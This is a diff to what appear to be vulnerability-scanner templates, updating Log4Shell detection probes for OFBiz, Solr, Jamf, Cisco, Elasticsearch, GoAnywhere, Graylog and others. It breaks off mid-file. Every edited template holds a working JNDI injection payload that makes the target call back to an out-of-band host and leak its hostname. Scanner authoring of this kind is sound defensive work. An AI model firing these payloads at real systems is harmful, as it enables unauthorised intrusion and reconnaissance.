diff --git a/.new-additions b/.new-additions index 141be645b2..7d2c21d7bc 100644 --- a/.new-additions +++ b/.new-additions @@ -1,51 +1,55 @@ -file/keys/postman-api-key.yaml -headless/technologies/sap-spartacus.yaml -http/cves/2017/CVE-2017-17731.yaml -http/cves/2020/CVE-2020-27481.yaml -http/cves/2021/CVE-2021-27314.yaml -http/cves/2021/CVE-2021-27315.yaml -http/cves/2021/CVE-2021-27316.yaml -http/cves/2021/CVE-2021-27319.yaml -http/cves/2021/CVE-2021-27320.yaml -http/cves/2021/CVE-2021-30175.yaml -http/cves/2021/CVE-2021-44228.yaml -http/cves/2022/CVE-2022-24264.yaml -http/cves/2022/CVE-2022-24265.yaml -http/cves/2022/CVE-2022-24266.yaml -http/cves/2022/CVE-2022-24716.yaml -http/cves/2022/CVE-2022-27984.yaml -http/cves/2022/CVE-2022-27985.yaml -http/cves/2022/CVE-2022-3980.yaml -http/cves/2022/CVE-2022-42095.yaml -http/cves/2022/CVE-2022-42096.yaml -http/cves/2022/CVE-2022-4328.yaml -http/cves/2022/CVE-2022-45037.yaml -http/cves/2022/CVE-2022-45038.yaml -http/cves/2022/CVE-2022-46020.yaml -http/cves/2023/CVE-2023-1020.yaml -http/cves/2023/CVE-2023-1671.yaml -http/cves/2023/CVE-2023-20864.yaml -http/cves/2023/CVE-2023-25135.yaml -http/cves/2023/CVE-2023-26360.yaml -http/cves/2023/CVE-2023-27350.yaml -http/cves/2023/CVE-2023-27524.yaml -http/cves/2023/CVE-2023-29489.yaml -http/cves/2023/CVE-2023-29922.yaml -http/cves/2023/CVE-2023-30210.yaml -http/cves/2023/CVE-2023-30212.yaml -http/cves/2023/CVE-2023-31059.yaml -http/cves/2023/CVE-2023-32235.yaml -http/default-logins/powerjob-default-login.yaml -http/default-logins/umami/umami-default-login.yaml -http/exposed-panels/oracle-opera-login.yaml -http/exposed-panels/papercut-ng-panel.yaml -http/exposed-panels/proxmox-panel.yaml -http/exposed-panels/red-lion-panel.yaml -http/exposed-panels/sophos-web-appliance.yaml -http/exposures/tokens/postman/postman-key.yaml -http/misconfiguration/apache/apache-zeppelin-unauth.yaml -http/osint/mail-archive.yaml -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml -http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml -http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml -http/vulnerabilities/wordpress/wpml-xss.yaml +cves/2017/CVE-2017-16894.yaml +cves/2020/CVE-2020-10199.yaml +cves/2021/CVE-2021-25078.yaml +cves/2021/CVE-2021-35250.yaml +cves/2022/CVE-2022-0747.yaml +cves/2022/CVE-2022-0769.yaml +cves/2022/CVE-2022-0773.yaml +cves/2022/CVE-2022-0846.yaml +cves/2022/CVE-2022-0864.yaml +cves/2022/CVE-2022-1903.yaml +cves/2022/CVE-2022-2219.yaml +cves/2022/CVE-2022-24223.yaml +cves/2022/CVE-2022-25485.yaml +cves/2022/CVE-2022-25486.yaml +cves/2022/CVE-2022-25487.yaml +cves/2022/CVE-2022-25488.yaml +cves/2022/CVE-2022-25489.yaml +cves/2022/CVE-2022-25497.yaml +cves/2022/CVE-2022-27926.yaml +cves/2022/CVE-2022-28032.yaml +cves/2022/CVE-2022-3062.yaml +cves/2022/CVE-2022-37190.yaml +cves/2022/CVE-2022-37191.yaml +cves/2022/CVE-2022-38295.yaml +cves/2022/CVE-2022-38296.yaml +cves/2022/CVE-2022-38467.yaml +cves/2022/CVE-2022-41441.yaml +cves/2022/CVE-2022-42094.yaml +cves/2022/CVE-2022-4321.yaml +cves/2023/CVE-2023-0099.yaml +cves/2023/CVE-2023-22620.yaml +cves/2023/CVE-2023-22897.yaml +cves/2023/CVE-2023-27008.yaml +cves/2023/CVE-2023-27159.yaml +cves/2023/CVE-2023-27179.yaml +cves/2023/CVE-2023-29084.yaml +default-logins/trassir/trassir-default-login.yaml +exposed-panels/appwrite-panel.yaml +exposed-panels/aspect-control-panel.yaml +exposures/logs/yii-error-page.yaml +misconfiguration/apollo-adminservice-unauth.yaml +misconfiguration/default-spx-key.yaml +misconfiguration/sql-server-report-viewer.yaml +misconfiguration/thinkphp-errors.yaml +network/detection/msmq-detect.yaml +network/enumeration/beanstalk-service.yaml +osint/hashnode.yaml +osint/imgbb.yaml +osint/rubygems.yaml +technologies/default-apache-shiro.yaml +technologies/switch-protocol.yaml +vulnerabilities/generic/cache-poisoning-xss.yaml +vulnerabilities/huawei/huawei-firewall-lfi.yaml +vulnerabilities/others/universal-media-xss.yaml +vulnerabilities/wordpress/ldap-wp-login-xss.yaml diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index be6470065f..d27d0f5285 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -55,19 +55,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request group: 2 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/02/28 diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index 0ce5dfa770..8da70d7c20 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -22,12 +22,16 @@ info: shodan-query: http.html:"Apache OFBiz" tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | GET /webtools/control/main HTTP/1.1 Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} + Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}} matchers-condition: and matchers: @@ -39,13 +43,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index 6c5f039642..33c6af9415 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -24,11 +24,15 @@ info: shodan-query: http.html:"Apache Solr" tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @timeout: 25s - GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1 + GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 Host: {{Hostname}} attack: clusterbomb @@ -52,10 +56,21 @@ http: - type: regex part: interactsh_request regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request + group: 2 regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index ccc0111b5c..3227490596 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -23,6 +23,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: @@ -41,21 +45,31 @@ http: words: - "dns" - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - - type: word part: body words: - "Jamf Pro Login" + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml similarity index 79% rename from http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml rename to http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml index 56aa00d60d..e86454abc3 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml @@ -22,13 +22,17 @@ info: shodan-query: title:"CloudCenter Suite" tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @timeout: 10s POST /suite-auth/login HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}} Content-Type: application/json {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} @@ -43,7 +47,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -55,10 +59,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/22 diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 345c87171d..90553b57bf 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/ccmadmin/showHome.do - appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin + appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -41,17 +45,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/04 diff --git a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index 9881afadea..703640362b 100644 --- a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In matchers-condition: and matchers: @@ -42,7 +46,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -54,10 +58,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by CS 03/27/2023 diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index 70617011be..a55dac0ea0 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml @@ -24,10 +24,14 @@ info: metadata: max-request: 1 +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost' + - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost' matchers-condition: and matchers: @@ -39,13 +43,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index b78a250390..cfde4d8c4e 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password= matchers-condition: and matchers: @@ -48,13 +52,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index f7b4b430ef..4f79fc42be 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -23,6 +23,10 @@ info: verified: "true" tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Referer: {{RootURL}}/mifs/user/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee matchers-condition: and matchers: @@ -47,13 +51,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 5f1af33221..72954c6ec5 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -21,10 +21,14 @@ info: verified: "true" tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | - GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1 + GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1 Host: {{Hostname}} { @@ -44,17 +48,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/04 diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index af60c637ea..065c5577b3 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -33,7 +37,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml - formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} + formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and @@ -46,7 +50,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex @@ -61,10 +65,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by cs 2022/10/10 diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index b4dde62e0e..0e48100e8b 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - {"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} + 